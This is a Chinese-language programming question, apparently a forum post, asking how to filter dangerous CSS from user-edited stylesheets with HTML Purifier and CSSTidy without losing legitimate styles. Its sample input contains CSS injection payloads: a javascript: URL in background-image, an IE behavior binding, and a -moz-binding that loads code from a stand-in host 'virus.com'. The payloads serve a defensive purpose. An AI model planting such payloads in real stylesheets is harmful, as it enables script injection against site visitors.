我允许我的网站用户直接编辑css文件,以便他们可以重新装修所有内容。但是我想删除所有危险代码(可能是危险的)。例如,我喜欢删除@import
,-moz-binding: url('http://virus.com/htmlBindings.xml');
,background-image: url(javascript:alert('Injected'));
等类似内容,以便我的网站始终保持安全。
我目前正在使用phppurify
和csstidy
。但是问题是,它也删除了想要的CSS样式。像
$input_css = "
body {
margin: 0px;
padding: 0px;
/* JS injection */
background-image: url(javascript:alert('Injected'));
}
a {
color: #ccc;
text-decoration: none;
/* dangerous proprietary IE attribute */
behavior:url(hilite.htc);
/* dangerous proprietary FF attribute */
-moz-binding: url('http://virus.com/htmlBindings.xml');
}
.banner {
position: absolute;
top: 0px;
left: 0px;
}
";
它仅返回a { color:#ccc; text-decoration:none } .banner { }
。我只想跳过危险的属性。我正在使用的代码是:
$config = HTMLPurifier_Config::createDefault();
$config->set('Filter.ExtractStyleBlocks', True);
// Create a new purifier instance
$purifier = new HTMLPurifier($config);
// Turn off strict warnings (CSSTidy throws some warnings on PHP 5.2+)
$level = error_reporting(E_ALL & ~E_STRICT);
$html = $purifier->purify('<style>'.$input_css.'</style>');
// Revert error reporting
error_reporting($level);
// The "style" blocks are stored seperately
$output_css = $purifier->context->get('StyleBlocks');
// Get the first style block
var_dump( $output_css[0] );